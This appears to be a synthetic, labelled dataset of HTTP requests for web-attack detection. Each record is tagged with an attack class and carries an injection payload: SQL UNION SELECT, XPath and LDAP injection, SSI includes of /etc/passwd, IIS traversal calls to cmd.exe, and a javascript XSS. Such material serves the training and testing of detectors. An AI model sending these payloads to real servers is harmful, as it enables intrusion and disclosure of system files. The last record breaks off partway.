GET /dIvepenaca/tOgajmjJIPHDS4HZ/aDMDU7m-kDROSs/sCBvudOowZnsmvjbWxx/L1jVformyNUD.3v/sHxugIK/hHOj@vRUFu@ws@L/giakejshd0edroDni/hLH8B/larem/neqKxNdBu-hs9Pi5pK.php3?Re3ddsspn=ha0ni&varZaQccz=72639439&wc3nelhtt=r&5dp=dstw&2-891_t0acceptqk=%3C%21--%23email+fromhost%3D%22www.Hzoshn.com%22+tohost%3D%22mailbox.iiEd.com%22+message%3D%22Esjs+emeyeya+ai0ea2T+e5ri%22+fromaddress%3D%22aegtst.com%22+toaddress%3D%228gAi.d1bsrh.com%22+subject%3D%22vo%22+sender%3D%22ro.com%22+replyto%3D%22e8arlne.com%22+cc%3D%22se%22+inreplyto%3D%22lr+8wt+t3%22+id%3D%22hJenmail%22+--%3E&olIoo=homeh&K0ab=m%26&siAubgrstaa=ih2tes+5Ld+ig&ki7ifs6z6eE=02 HTTP/1.1
Host: 124.192.16.212
Connection: keep-alive
Accept: audio/x-wav, application/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.5
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 186.197.175.198
Cookie: esos1=5290;deleteun-RgdrmR=o87ifAetct;yoslDulIk=eecrss;yn5wrunz=esdmrn;nder=Riamd;dtgtrfcuakhn=595956
Cookie2: $Version="92"
Date: Sat, 22 Jan 05 22:56:36 CET
ETag: "otK3._w2Ir0715BPHo"
Expect: 100-continue
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 22 Sep 06 11:31:20 GMT
If-Unmodified-Since: Sun, 13 Dec 09 11:06:30 GMT
If-Match: "_iMfvm.9iG3oxzzt5"
If-None-Match: "ItNHGv2j75thLlL5-"
If-Range: Wed, 20 Feb 08 08:46:09 UTC
Max-Forwards: 306
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic em5ldHNsZTplTXRuT3Jvdg==
Authorization: Digest nonce
Range: 396191-323,-9
Referer: http://Mn8tip.net/umrvs/rksBte.exe
TE: chunked,deflate,deflate
Trailer: If-Modified-Since
User-Agent: rAx8otu/2.6.3.4.7
UA-CPU: 68000
UA-Disp: 080,349,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3402x217
Via: 9.8 91.2.152.197, haroe/1.8 146.171.90.74, FTP/6.0 www.fslhrtal.htm:92215
Transfer-Encoding: identity
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 323 73.178.52.116:03197 "ltotAehablocoeeRgen" "Sun, 08 Feb 09 14:43:34 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 93635281760343064416
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39369
Start - Id: 49207
class: XPathInjection
GET /n73.X6PtvpF4/nuL@7fTjRre92W58Uc/a4qdsvaHKQHeSP/teoiaLdghl6fnd5sinui/obiaNoaCa6rf.msf?XMKZPndropdelete.aQ=%26s1gEsexp_t&nbsSi=noratsm&eI=y%7E&d0it8E=r+5uforms%2Beap%7Etzl&inputJUCyid3yhRpD=9siefAsA&htTnz=%3Cilrrt%3Fegso%3Aa%2B&ea2n2Iwureehex=46&Dy8Q=eom%27++or+At6%2Feu%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D04%5D+++++or+++++%27mhboelar%27++++%3D++%27&aenhvem6l=84873&n1cjAaai3ahssnn=esr&za=50&ellisrf2ds=iitcwaiepmn&uoe6mnme=27746&lq2moHxtueti=647348283 HTTP/1.0
Host: www.nqdsu.gov
Connection: iqhqioE
Accept: */*
Accept-Charset: cp-936;q=0.1, ks_c_5601-1987;q=0.6, cp-936;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.4
Cache-Control: max-age=268
Client-ip: 0.187.188.191
Cookie: M%uBV=oWjCVUhUs5l;jyeoTnmVguHdy=xgtylideNrea0;4lwVt.rG=Tn3Cqnlik
Cookie2: $Version="2"
Date: Sun, 19 Aug 07 09:45:49 GMT
ETag: W/"PMFtKm7M45ftXYT2iM8i"
Expect: kwohSom
From: Gswzt6t2@seem.gov
If-Modified-Since: Tue, 20 Jun 06 07:08:49 GMT
If-Unmodified-Since: Mon, 29 Aug 05 16:43:16 CET
If-Match: "ncFI5WbOf.yRmo2jr"
If-None-Match: *
If-Range: Thu, 24 Apr 08 20:09:51 CET
Max-Forwards: 5373
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Basic cHJybjo3b21JaXI=
Range: -392691
Referer: http://www.imyoleq.st/ijemeqr.zip
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: rt7wBniwx1 http://www.uA8ihh.st
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 8.2 25.152.84.181, 2.1 135.117.29.145, FTP/4.0 230.172.96.139
Transfer-Encoding: compress
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 738 www.iaeo.png "RrzpoiHnn" "Fri, 27 Feb 09 20:57:20 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49207
Start - Id: 45406
class: PathTransversal
POST /varujO-a_4/sn9d4tTwo/bP3QBim1A.php4? HTTP/1.0
Content-Length: 371
Content-Language: oeNtio1u
Content-Encoding: gzip
Content-Location: /inlL/yocePe/oWsihc/tdrvo/rphn8s.jpeg
Content-MD5: ZHRMb2Vkc2FpbWdlaWxTdw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Feb 05 18:50:20 GMT
Last-Modified: Sat, 25 Aug 07 07:16:01 CET
Host: 174.67.132.110
Connection: keep-alive
Accept: image/*;q=0.7, audio/*, application/*;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.1, windows-1258
Accept-Encoding: 
Accept-Language: sE-e91tMk;q=0.7, unyei-akdbrhoc;q=0.2, Dd-ttoye, ah-iEyYy, aT-dte4d
Cache-Control: no-transform
Client-ip: 204.131.31.4
Cookie: tntiyd5rh=gosi82y;7umto=DdGlibpswdt1%u;M8TP8.Os=bupa6;ah69tfo=0185336873;a6teeEdxdlaoSha=9798;5bnt1szthmz=3
Cookie2: $Version="27"
Date: Fri, 16 Nov 07 14:07:49 UTC
ETag: W/"VCORCTrRhO2WKCTHsr"
Expect: tfrsm=sosgerh;sBoaj3pd=n6aTco
From: d1Subs@Oaeelb.fr
If-Modified-Since: Tue, 02 Jan 07 20:20:53 GMT
If-Unmodified-Since: Sun, 19 Apr 09 13:57:57 GMT
If-Match: "Ca7G-c1Fsah1tqkn"
If-None-Match: *
If-Range: "is5.OAWIIPMufqKrAkWQ"
Max-Forwards: 57
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: qei4S 0e1e=mede
Authorization: Basic ODZ0YWE6cnZ5cnd6d3A=
Range: 50-63221
Referer: /nyer/leOtrolo.swf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.3 (compatible; rTtff; Unix; iaISa; isae9rotr)
UA-CPU: MIPS
UA-Disp: 9471,9312,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 789x027
Via: 3.2 89.183.243.129:40, 5.7 230.42.81.44:9663
Transfer-Encoding: nl5ei
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 279789
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

frrfHpr=U&rma0Lhes4twrfbn=uks&9x2cpiAu=hTa(sieear)copy wget+fr(5&Tntrsn2gz0=oh5s+&ieeoiyamiaunrio=ucrasigdtuHa&45IHioevhnw=whylssaeshn4R&suoaisda2eEoeie=..\..\..\..\..\..\..\..\..\WINNT\system.ini&mTOabbv=ahe7dleo1heV7&aoh=dqa&gNechosystem9M=openumoodsdhomeise=j &l0EIueieaef=dYBg&oeh=on4icb&ntiSd4n=dHrdtXRal/7&FG=s00eo&ncnra=uxasIiratI

End - Id: 45406
Start - Id: 49525
class: XPathInjection
GET /@0qxkuE@@Nkexectinsert.php4?nuw5ot=e6se%27++++or++++6++%3C+++++count%28path%2Fchild%3A%3A*%29++or++++%27tage%27++%3D++%27&sZ=762269478&eiay=00546224 HTTP/1.1
Host: www.h2nothre.st
Connection: close
Accept: image/gif;q=0.5, text/html
Accept-Charset: x-mac-cyrillic, iso-8859-4;q=0.4
Accept-Encoding: compress, deflate;q=0.9, compress;q=0.3
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 91.134.19.242
Cookie: em8i3ylhit=mS_qLb;e5=19
Cookie2: $Version="32"
Date: Fri, 03 Aug 07 18:39:59 CET
ETag: "pUBVRGni3kIAQ_BM_qDc"
Expect: Set5qe
From: jwtneu@uosy.be
If-Modified-Since: Sun, 12 Apr 09 20:51:59 UTC
If-Unmodified-Since: Sun, 22 Feb 04 16:19:12 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 584
MIME-Version: 4.3
Pragma: rsoeut='5at'
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: trirmd Hhblet=qhne
Range: 72-,357-,72130-42
Referer: http://dSvttoe.st/Dei4j.aspx
TE: deflate;q=0.5
Trailer: Trailer
User-Agent: qegorsbdel30
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5470x3164
Via: FTP/9.8 1.93.204.175
Transfer-Encoding: eetfro
Upgrade: 2ao/4.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 4596241823364339
----: --------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49525
Start - Id: 39625
class: SSI
GET /Jlink/ydh3SegwetaEhrau/e9gsdoaysamHaed8nr/nn6eEyg/mKjZmnGFzxP80rSL/iNl1tlddt7teeti4c/d4/Vwindow.open0@Cw/hsqIUO7/8Ud9.aspx?dahmenaydo=ezreeootrhisoi&telnetkhavingS=265&Trib3pecC=7189274&andPFyb9=egi7&dnneAiTw=8970299269&nvu=%3C%21--%23include++virtual%3D%22%2Fetc%2Fpasswd%22+--%3E&enNaor=hetLaNeyp&risefmRssi=hTnibtdbsRAoml&iri=hh0pEIta%5DnLtetcla%5C&ee=5245209913&ernsadnso=5u&ni=e%7COeookiei38aareplace&N0tbzeeortere=054342 HTTP/1.0
Host: www.ei9OK.org
Connection: olonrS1d
Accept: text/html;q=0.4, audio/basic;q=0.8, image/png
Accept-Charset: windows-1251, euc-cn;q=0.4, iso-8859-1, iso-2022-jp;q=0.5, iso-8859-4
Accept-Encoding: *;q=0.6
Accept-Language: eLptg-c1zdilt;q=0.6, eprm-lioUf, aoysDesr-rige;q=0.1, azl-peomtlry;q=0.2
Cache-Control: only-if-cached
Client-ip: 79.170.36.207
Cookie: 6A@Is5gYVvari0=dx@WsS6VeE;0a4lZzGk=gaDo;OlSNobjectd=17320431;avl=oa<7;toata=ens a]jiscripthHporewiafdocument
Cookie2: $Version="78"
Date: Thu, 19 Feb 04 04:02:44 GMT
ETag: "JNM4muUx1V.zdKmp.HOl"
Expect: flihr
From: nneTpp@ds2o4khd.org
If-Modified-Since: Thu, 10 Dec 09 03:56:15 GMT
If-Unmodified-Since: Wed, 06 Aug 08 05:59:41 UTC
If-Match: "m.DST8zmVmUW-Zbivvl"
If-None-Match: *
If-Range: "1tBDwK1AmirrXI9L"
Max-Forwards: 1
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest nc=2CEcd91a
Authorization: eaiie 8oiF=aChthh
Range: 973-,-4,32221-
Referer: http://syltHrg.uk/sdsozgi/neeh.gif
TE: trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/6.9 (compatible; Konqueror/1.7; Mac OS X; lasnbasAar)
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: 7.3 80.176.58.194
Transfer-Encoding: s5siuc; Amsanteh=2uiWS
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 475 125.51.35.41 "LSrhe" 
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 661984692472
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39625
Start - Id: 41259
class: SqlInjection
GET /zVWydelete8/etWP_sq28kk6Rfe1i6VW/WAsZ/u_zd@qVOGD5/ezWcAJi6iIuEc/sPvIpAL4GAjRmON/o.jBs4A8-l0_ygdiLI/l-vQDKN17m60DiY/veubi7ajoScl/onnyrYIcs7ion.css?lmosIm4=ibtl0&keerNa50jte=maSn&eDingg=acbZJ7LJ&oeavw=ERer79deHdtyia&juit=shutdowninputeocmOLmqwf++NWo&mmDtl=nHPGX1Evs&ly5e2esheevth=dw3&tNyhlInn8Osaed=376512&ee8a8Oeick=mS+yIeefi&l5Easq1=gtIza&umceoe=ywindow.openhaeanullt3yne HTTP/1.0
Host: www.eerreeplwb.ch
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.1, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 102.193.65.233
Cookie: rttcgbSnnOlo=')  UNION    ALL  SELECT jhtt     ,    rnehch  ,  exsetr6I  FROM     hh  WHERE    13f9amuvta NOT    IN  (    '3avcr'  )    AND    rddnsotsn    NOT     IN  (  '1orti')  AND ''=  '
Cookie2: $Version="29"
Date: Thu, 28 Jul 05 21:42:19 UTC
ETag: W/"RiWkqk4YvZ2cZuj"
Expect: 100-continue
If-Modified-Since: Sat, 05 Dec 09 08:18:13 UTC
If-Unmodified-Since: Thu, 11 Oct 07 08:47:52 GMT
If-Match: *
If-None-Match: "M5Pl2CSd92YxyDf"
If-Range: *
Max-Forwards: 971
MIME-Version: 2.9
Proxy-Authorization: Digest username="htctmgeT"
Authorization: ontSes llrhn=Eirnka
Referer: http://xneijg.cz/gshAeima/eeig.pdf
TE: deflate,deflate
User-Agent: up4a (iFX5NTOfv; enwjNmGn9; eDxPFSak3@)
UA-OS: Win9x
Via: 8.4 165.79.54.110
Transfer-Encoding: deflate
Upgrade: uaiiie/9.7, uslvel/1.2, jlr/9.6, aowern/5.3, alax/3.9
Warning: 157 132.86.170.183:5492 "o5cahovhreerH" 
X-Serial-Number: 31839527885705
~~~~~: ~~~~~~~~~~

null

End - Id: 41259
Start - Id: 37604
class: LdapInjection
POST /ceatnlrs0neourn/uIstueManc8io/linsert30Z8GTXT/jeRnuNImvup3lpRFCtYc.html? HTTP/1.0
Content-Length: 68
Content-Language: 0K,Z
Content-Encoding: compress
Content-Location: /ainrleh/rslSoos/eakN.fgf
Content-MD5: bnQ1ZWFRR1RobGhub29saA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Mar 04 19:20:07 GMT
Last-Modified: Fri, 04 Aug 06 09:31:37 CET
Host: 111.237.31.34
Connection: usQxql6
Accept: image/*, text/html;q=0.8
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, identity;q=0.3, identity, deflate, deflate
Accept-Language: f73tt0-kf
Cache-Control: no-transform
Client-ip: 84.232.100.185
Cookie: fusbve=riT Hda te;w84dm=627926;he=jFZoBC9;eiier4=aT13ku;atleut=cemt
Cookie2: $Version="2"
Date: Wed, 14 Oct 09 06:41:01 GMT
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: shqwscZ@htnl9xec.gov
If-Modified-Since: Fri, 18 Jun 04 22:56:49 CET
If-Unmodified-Since: Mon, 25 Sep 06 16:51:15 CET
If-Match: "ESN@9jgCV2kxO9VF"
If-None-Match: *
If-Range: Thu, 17 Feb 05 08:09:32 GMT
Max-Forwards: 1615
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: NTLM Z2YxM2lmdHl0aG1udG1ydEF0cm9BV2U4aUF3cnJ0dzBJbmxlbW5ybjd0
Range: 5-,297-087
Referer: /allaih6O/mnscdet/naQo/hmE7jren/amye9enz.cgi
TE: chunked;q=0.2,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.9 (X11; U; Linux i386 4.4; tl-b5; rv:3.1.6) Gecko/65538387
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: HTTP/0.8 119.213.14.150, 1.5 www.eodt.html:0569
Transfer-Encoding: nn1ome
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 105.35.228.101
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s7sL9erh=tN9W&hn=)  (   | (1Y5=e9z*)&MtmpYIuq1W0=6869855

End - Id: 37604
Start - Id: 44492
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 253.233.25.45:80
Connection: oikifn
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: e='dr'
Client-ip: 224.120.218.101
Cookie: 4bH3yyservicesg=Et;rannaeaRsceer=eIt;ncuPyNxLf_75xml=i@hJoZV;9erwst=lUbD_ldfp;ntiu3tsma=soNyqFoZcd;Dneeesehntyeo=eaydZrje6b
Cookie2: $Version="7"
Date: Mon, 31 Jan 05 08:44:28 UTC
ETag: "brWHOt3l4ea9t1DC"
Expect: 100-continue
From: cI4oaebh@nrntt4iEtl.fr
If-Modified-Since: Mon, 01 Oct 07 05:25:10 GMT
If-Unmodified-Since: Sun, 06 Mar 05 21:44:55 GMT
If-Match: *
If-None-Match: "hHxYE5g60ui.qGzhd"
If-Range: "v-lub7Me1IPbwi8kUN"
Max-Forwards: 998
MIME-Version: 5.5
Pragma: i=eftw
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: stacy7 2feono=dnha
Range: -80,3-,-9028
Referer: http://www.agD5.com/ghnwt.asmx
TE: chunked;q=0.3,deflate,trailers
Trailer: Via
User-Agent: Mozilla/0.6 (compatible; Konqueror/4.6; Win98; gbsiendkm)
UA-CPU: Sparc
UA-Disp: 3780,9274,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 949x9593
Via: o4u/8.8 www.sriy.css:42353, ennsme/1.0 www.Z4csn.tiff
Transfer-Encoding: compress
Upgrade: tNaw/6.0, n1eien/5.5, iol/1.2, Rlt5/6.0
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44492
Start - Id: 41279
class: SqlInjection
GET /cOA2-fqi/rq_dxm8x1UyZyB-d5N.aspx? HTTP/1.1
Host: www.mswylaato.net
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: Be-n, Te-acntgis;q=0.4, 7ae-4sCdoi, ersrwioh-tcEec;q=0.9
Cache-Control: max-stale=057
Client-ip: 170.240.213.203
Cookie: ENnneMez=or   0<>(select    count(*)    from   w7jiylge);9Egwohdoqsasoh=ihcast;egaeieh5faecobn=670;-3rSyG4nqJ=508623
Cookie2: $Version="7"
Date: Sun, 05 Jul 09 02:36:27 CET
ETag: "RwUFwv_47PNnyMM"
Expect: ghse4=irnn;asNw3eo
From: elRhz@z5H6d.it
If-Modified-Since: Sun, 01 Jul 07 11:48:04 CET
If-Unmodified-Since: Fri, 16 Jul 04 02:53:54 CET
If-Match: *
If-None-Match: *
If-Range: "44fZmDS5VELLVR5uMCI"
Max-Forwards: 693
MIME-Version: 0.7
Pragma: 6s1Z=i3rjsNl
Proxy-Authorization: deoa hlT7nho7=cepy
Authorization: NTLM djBlcG5oNmFkbnRFRXA5dGhuY2h3bWVkd3RocWhkbWVlOHlobHVzamFuM2VveA==
Range: 9564-
Referer: http://tled7bi.uk/psud/38jpPaig/asicln1/zet7nOo.php4
TE: trailers,trailers
Trailer: From
User-Agent: eRtFiend9ectdriorucw
UA-CPU: StrongARM
UA-Disp: 6178,926,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1296x4154
Via: 9.6 www.5nseruo.png, 1.8 www.eamtr.html
Transfer-Encoding: identity
Upgrade: yEe/8.1, maee/7.8, t0msf/7.4
Warning: 904 132.169.173.178 "wtas" "Sat, 07 Mar 09 23:37:50 UTC"
X-Forwarded-For: 7.111.55.106
X-Serial-Number: 891769847073825
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41279
Start - Id: 36576
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.stySzem.gov:46
Connection: close
Accept: */*
Accept-Charset: iso-8859-1, x-mac-cyrillic;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=12404
Client-ip: 216.64.166.207
Cookie: Srqi4rLgu5ioR2t=reszt;Xo7Tn=4;y_j02OlW=8121813970;iei=doSlo;.22N=33355157
Cookie2: $Version="80"
Date: Wed, 23 May 07 15:42:06 CET
ETag: "KAH1MryK8eDOI3dzdV"
Expect: eAdl7
From: osNAoh@aHn2nry.de
If-Modified-Since: Mon, 19 Dec 05 21:26:19 UTC
If-Unmodified-Since: Sun, 09 Aug 09 14:42:19 CET
If-Match: *
If-None-Match: "DOofAM4n6gcYEHEXwDH"
If-Range: "4JPZ-PcrArb1Gzp0jqi"
Max-Forwards: 085
MIME-Version: 3.8
Pragma: 6io=iyygkv
Proxy-Authorization: Digest nonce
Authorization: Basic ZXdoY3A6Um5sc3I=
Range: 599-
Referer: http://tehrokh.it/jTutui/nbuIy7Dt/rtWm8nv.mspx
TE: trailers,deflate
Trailer: If-Match
User-Agent: tsocmOteh (sZnqzW@D; oEcaeBvH2g)
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 186x739
Via: HTTP/0.0 www.aredjrc.tiff, 8.2 www.bxed.png, FTP/9.6 www.atenwi.png:5394
Transfer-Encoding: gzip
Upgrade: t2w5X/9.8
Warning: 791 150.111.227.182 "ltte" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 674486890515415
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36576
Start - Id: 44143
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.5rh1tlai.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: tnpsfnyf-nigs;q=0.8
Cache-Control: no-transform
Client-ip: 31.223.174.93
Cookie: yaJouAiyuekie=addaa;lIOnsr=11155185;iolplrbsyfnnhe=29785256
Cookie2: $Version="03"
Date: Wed, 11 Jan 06 16:22:55 UTC
ETag: W/"W7fa4Q-.MjhJ7B8G"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sat, 09 Jan 10 01:34:53 GMT
If-Unmodified-Since: Sun, 21 Jun 09 04:15:17 CET
If-Match: *
If-None-Match: *
If-Range: "DX5982-v6mPIKEx"
Max-Forwards: 71
MIME-Version: 4.2
Pragma: 6mAtm9f=4njseaeI
Proxy-Authorization: Digest realm
Authorization: inonem stbenh=ynwoeee
Range: 815-,644-20793
Referer: http://www.sniue.com/eaum.doc
TE: gzip,deflate;q=0.7,trailers
Trailer: Date
User-Agent: xiaioeop9nwdE07
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/6.1 www.oNidwgea.shtml, 4.5 www.hctuThra.jpeg
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 107 www.si6e.html "aijehiis7sesns5zav5" "Sun, 10 Oct 04 08:09:53 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44143
Start - Id: 41516
class: SqlInjection
PUT /nRX.2jep/ogwtou4rdcarwlsnTt/fGts9e/r96m5/wytowhoMwxothaiete/iVaf0xcbY.KjW2_8@Xm/acXm1IDH9kLH1Tc4y/fbbk1/2m/aU@Q5vZreEgT/6ttDq5e5pa.msf? HTTP/1.1
Content-Length: 91
Content-Language: fl
Content-Encoding: deflate
Content-Location: /cstnl.asmx
Content-MD5: bm9uZ2RoZWVnbmF5bXhyZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jul 09 01:36:50 CET
Last-Modified: Sat, 06 Oct 07 08:27:00 UTC
Host: 252.110.166.27
Connection: oof1gU
Accept: image/jpeg;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.1, gzip, compress;q=0.5
Accept-Language: trt-nnyoc2;q=0.7, dtetcae-2;q=0.5, wawtn-agi;q=0.0, tl6beodh-keg
Cache-Control: only-if-cached
Client-ip: 78.241.99.85
Cookie: eeEW=i05j.;Ssreclt=p_m4V;oro4klislShp= h
Cookie2: $Version="8"
Date: Wed, 20 Jul 05 18:57:58 CET
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Fri, 11 Aug 06 08:21:48 GMT
If-Unmodified-Since: Tue, 15 Dec 09 12:46:48 GMT
If-Match: *
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: Thu, 23 Aug 07 19:29:15 CET
Max-Forwards: 13
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic ZkkyNTpucm9z
Authorization: Basic aEFyMzpVc2cwYm4=
Range: -68
Referer: /1qsk1nu/mcn02e/hubnss/eopctob/dmlN.avi
TE: chunked,chunked,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.8 (X11; U; Solaris 2.9; qo-Dh; rv:5.8.3) Gecko/37132756
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: aMeig3/4.7 www.edelerkf.png, 0.7 179.93.126.143:9, naa/7.5 www.IeGes.html:6832
Transfer-Encoding: gzip
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

asdo3=088579&teigdsr5rx=edastdin&iuAyno=qwer'   or    snre_v.Account='onsitb@Wn.com

End - Id: 41516
Start - Id: 47481
class: XSS
GET /16Y.45fUW/axK4S@XT/eHtds5-m9e2tylY2o5/eHExtn3wnhndwhdoa/V4E6k/s_dkhotg4H2@j.O4/Mbs5TGPR/pnvtfa3guneirhtrmgz/aAl1V1s1u1/T-thhm/tTmoi2aeh9o6MrLcrkod.js?gjeufyd=161&hoeltau=iq%3A+tcnsi%28Sstdin&10de=2886722349&tahcvh=wgetD&gp3iI=%3Cmeta+++http-equiv++++%3D%22++++refresh+++++%22++++content++%3D+%22++++0%3Burl%3Djavascript%3A++%5Balert++%28%27TtOtleM%27%29%3B%5D%22++%3E&elfob=306626&ffEwfskc0ro=ertma9njeat3aitbt&1twet=%7Escript+r%3AarRaccess_logB&adsenqlooo5=cselect%3Chp&cHorsosiSeo=%40e&BVlqxe=wKetnetantnv+elheval HTTP/1.1
Host: www.Bierra.net
Connection: close
Accept: */*;q=0.8
Accept-Charset: euc-kr;q=0.7, cp-950
Accept-Encoding: gzip;q=0.1, deflate;q=0.3
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 205.71.159.23
Cookie: lutmicebdD0Ss5=30;n8nri=esotirnfTec=gqtbphp;ans2mcqrmatt=el9;taseoeeanacrd0=d0UGtNF;ctDeyeaugtup8ee=3
Cookie2: $Version="7"
Date: Sat, 12 Jan 08 17:16:04 CET
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Fri, 08 Oct 04 18:18:21 CET
If-Unmodified-Since: Wed, 12 Aug 09 09:59:31 UTC
If-Match: "6ws-g8rj4ia9UoU762a"
If-None-Match: *
If-Range: Mon, 18 Aug 08 20:08:52 CET
Max-Forwards: 8265
MIME-Version: 9.2
Pragma: lRReeu=ae
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 1-845224,09-
Referer: http://www.ajtoscw.cz/htp8am/cyedc2e/ubnsgh.jsp
TE: trailers,trailers,chunked;q=0.2
Trailer: Authorization
User-Agent: Mozilla/6.1 (compatible; MSIE 8.1; Linux i586; sdSto; PZwj; 1wyEagIe)
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: identity
Upgrade: oRe/6.0, mo1/5.0, epS/1.1, rTdr/5.1
Warning: 858 www.Bomdfr.html:92 "eaLxhrCi8Tuapar" 
